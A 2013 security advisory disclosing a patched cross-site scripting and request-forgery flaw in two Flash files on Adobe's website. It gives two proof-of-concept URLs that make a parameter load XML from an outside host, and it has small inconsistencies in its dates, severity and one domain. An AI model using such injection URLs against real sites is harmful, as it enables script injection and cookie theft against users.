Adobe - CS Flash Cross Site Vulnerability & Filter Bypass

Document Title:
===============
Adobe - CS Flash Cross Site Vulnerability & Filter Bypass


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1022


Release Date:
=============
2013-09-25


Vulnerability Laboratory ID (VL-ID):
====================================
1022


Common Vulnerability Scoring System:
====================================
2.1


Product & Service Introduction:
===============================
Adobe Systems, Inc. is an American multinational computer software company headquartered in San Jose, California, 
United States. The company has historically focused upon the creation of multimedia and creativity software 
products, with a more-recent foray towards rich Internet application software development.

Adobe was founded in December 1982 by John Warnock and Charles Geschke, who established the company after leaving 
Xerox PARC in order to develop and sell the PostScript page description language. In 1985, Apple Computer licensed 
PostScript for use in its LaserWriter printers, which helped spark the desktop publishing revolution. The company 
name Adobe comes from Adobe Creek in Los Altos, California, which ran behind the houses of both of the company\\\\\\\'s 
founders. Adobe acquired its former competitor, Macromedia, in December 2005, which added newer software products 
and platforms such as ColdFusion, Dreamweaver, Flash and Flex to its product portfolio.

As of 2010, Adobe Systems has 9,117 employees, about 40% of whom work in San Jose. Adobe also has major development 
operations in Orlando; Seattle; San Francisco; Lehi, Utah; Minneapolis; Waltham, Massachusetts; and San Luis Obispo, 
California in the United States; Ottawa, Canada; Hamburg, Germany; Noida and Bangalore, India; Bucharest, Romania; 
Basel, Switzerland; and Beijing, China.

(Copy of the vendor Homepage: http://www.adobe.com)


Abstract Advisory Information:
==============================
Vulnerability Research Team has discovered a remote client side bug in a flash component in the Adobe Systems official website application.


Vulnerability Disclosure Timeline:
==================================
2013-07-17:	Researcher Notification & Coordination (Ateeq Khan)
2013-07-18:	Vendor Notification (Adobe - Security Team)
2013-08-13:	Vendor Response/Feedback (Adobe Security Team)
2013-09-24:	Vendor Fix/Patch (Adobe Developer Team)
2012-09-26:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Adobe Systems
Product: Online Service - Web Application 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A vulnerability laboratory researcher has discovered a flaw inside this particular flash component currently active 
and running on the main website of Adobe Systems (www.adobe.com). The affected component lets a remote attacker 
include xml files from external non validated websites resulting in successful HTML Injection & XSS attacks. 
Attackers are able to execute malicious non-persistent script code on client side and at least two different .swf files 
have been identified that are affected with this vulnerability.

Depending on the Flash player version, the reported issue will be a Cross-Site Scripting or a Cross-Site Request Forgery 
vulnerability. In Flash player versions 8 and below, the usage of a globally undefined variable in any function that 
makes a web request will result in a Cross-Site Scripting vulnerability; however in Flash player version 9 and above 
this vulnerability has been partially mitigated by Adobe resulting in a Cross-Site Request Forgery vulnerability.

Given the user’s Flash player is version 9 or above, the end user may be subject to Cross-Site Request Forgery attack. 
Cross-Site Request Forgery allows an attacker to create an unauthorized web request to a sensitive resource on the 
user’s behalf. Recommendations for mitigating this type of attack are to initialize any global variables in the Flash 
application; however if FlashVars need to be used, proper input validation should be performed.

The affected path is `/enterprise/partners/sap_tour/Misc/`

The affected parameter is `csConfigFile`

Normally, it is required to load an xml config file from the localhost however the parameter `csConfigFile=` due to 
non validation, can be manipulated using the GET method to include remote malicious .xml files of attackers choice. 
Once included, the client-side script code will be executed in the flash web application layout as frame. 

Given the user’s Flash player is version 8 or below, a Cross-Site Scripting vulnerability may be executed by an attacker. 
If successful, Cross-Site Scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that 
can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems. 
Recommendations for mitigating this type of attack are to initialize any global variables in the Flash application; 
however if FlashVars need to be used, proper input validation should be performed.


Vulnerable Path:
				[+] http://www.adobe.com/enterprise/partners/sap_tour/Misc/

Vulnerable File(s):
				[+] Improving_Customer_Service_controller.swf
                                [+] Customer_Cummunications_Management_controller.swf

Vulnerable Parameter(s):
				[+] csConfigFile


Proof of Concept (PoC):
=======================
The client side cross site scripting vulnerability can be exploited by a remote attacker without any authentication 
and low or medium required user interaction. For demonstration or reproduce ...


POC Link #1:
http://www.adobe.com/enterprise/partners/sap_tour/Misc/Customer_Cummunications_Management_controller.swf
?csConfigFile=http://www.evolution-sec.com/clients/flashjs/test.xml


POC Link #2
http://www.adobe.com/enterprise/partners/sap_tour/Misc/Improving_Customer_Service_controller.swf
?csConfigFile=http://www.evolution-sec.com.com/clients/flashjs/test.xml


Review: Source Code

MovieClip 0{
    // Frame 0
        // Action0
            {
                loadConfigFile = function () {
                    ConfigData = new XML();
                    ConfigData.onLoad = configFileLoaded;
                    ConfigData.ignoreWhite = True;
                    if ( ( _root.csConfigFile == Undefined ) ) {
                        _root.csConfigFile = "config.xml";
                        
                    }
 var __callResult_34 = ConfigData.load(_root.csConfigFile);    // Validation is not being performed before loading the config file!
                    CSData = new Object();
                    
                }



Solution - Fix & Patch:
=======================
Set appropriate allowScriptAccess and allowNetworking parameters within the HTML code. Perform data validation on 
variables sent to URL functions to ensure only http:// and https:// protocols are allowed; validate that the URL 
is for an allowed domain or use relative URLs. Escape special characters placed within HTML text fields. Do not 
use HTML text fields unless HTML support is needed. Compile the SWF for more recent Flash Player versions. 
Encourage users to have the latest version of Flash Player to view your content.


Security Risk:
==============
The security risk of the client site cross site web vulnerability is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan ([email protected]) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]